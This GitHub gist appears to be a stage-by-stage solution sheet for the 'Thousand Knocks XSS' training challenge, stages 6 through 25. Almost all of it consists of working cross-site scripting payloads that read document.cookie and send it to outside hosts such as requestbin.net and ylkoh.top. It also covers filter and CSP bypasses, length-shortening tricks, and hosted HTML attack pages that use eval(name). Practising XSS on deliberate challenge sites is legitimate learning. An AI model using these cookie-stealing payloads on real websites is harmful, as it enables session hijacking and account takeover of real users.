Skip to content

Instantly share code, notes, and snippets.

@Isopach

Isopach/knock.xss.moe.md

Last active June 28, 2020 16:44
Show Gist options
  • Save Isopach/b5b6d996ce22862a9703335eb62adf68 to your computer and use it in GitHub Desktop.
Save Isopach/b5b6d996ce22862a9703335eb62adf68 to your computer and use it in GitHub Desktop.
Download ZIP
Thousand Knocks XSS
Raw
knock.xss.moe.md

{} = URL to view requests

Stage 6 /?q=</xmp><img+src=1+onerror=location.href='{}?'+document.cookie>

Stage 7 /?q=%27%20onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27 #なんでautofocusに値を入れないと実行されないでしょう?

Stage 8 /?q=%27onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27

Stage 9 /?q=XSS%20onfocus=location={}?%2bdocument.cookie%20autofocus

Stage 10 /?q=javascript:onerror=location={}?%2bdocument.cookie

Stage 11 /?q=javascript:onerror=location={}?%2bdocument.cookie

Stage 12 ?q=javascript:onerror=top.location={}?%2bdocument.cookie

Stage 13 ?q= //document.cookie, window.sessionStorage, window.localStorage is being censored //their base64 versions atob('ZG9jdW1lbnQuY29va2ll') etc is also being censored

Stage 14 #Set document.domain self to bypass CSP + append payload (parent.document.cookie is important because you want the first URL's cookie) ?q=//8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?document.domain=%27knock.xss.moe%27;top.location.href=%27http://requestbin.net/r/17yvn3e1?%27+encodeURIComponent(parent.document.cookie)

Stage 15 #Add script tag, no CSP ?q=%3Cscript%3Etop.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie%3C/script%3E

Stage 16 ?q=javascript:top.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie

Stage 17 ?q=javascript:top.location.href='http://requestbin.net/r/17yvn3e1?'%2Bparent.document.cookie

Stage 18 #Escaping quotes enclosing URL didnt work ?q=');top.location.href=http://requestbin.net/r/17yvn3e1?%2Bdocument.cookie//

Stage 19 #alert('Hello',1,alert(0)) <- put payload to execute second alert before first alert ?q=%27,1,window.open(http://requestbin.net/r/17yvn3e1?%2Bdocument.cookie));//

Stage 20 #<script> tag is being filtered. Use svg onload etc instead. ?q=<svg onload=javascript:location.href=http://requestbin.net/r/17yvn3e1?%2Bdocument.cookie>

Stage 21 Same as Stage 20

Stage 22 #Use a short domain name ?q=%3Csvg%20onload=javascript:location=//ylkoh.top?%2Bdocument.cookie%3E

Stage 23 #Shorter! ?q=%3Csvg onload=location=//ylkoh.top?%2Bdocument.cookie%3E

Stage 24 #Shorter!! (put payload on hosted page) ?q=<svg onload=location=//ylkoh.top/x.html>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >

  <img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>

<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://1498f071159fd60222c0e7e82b7b6ff046e9e52e.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>

Stage 25 #Host this payload externally and Enter link directly into submission box http://ylkoh.top/x

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >

  <img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>

<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://8e67e39d7e01213d5551c696ef8641b625cc8dd7.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>
@Isopach
Copy link
Author

Isopach commented Jun 28, 2020

Just made it public as it helped me to learn about XSS a lot

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment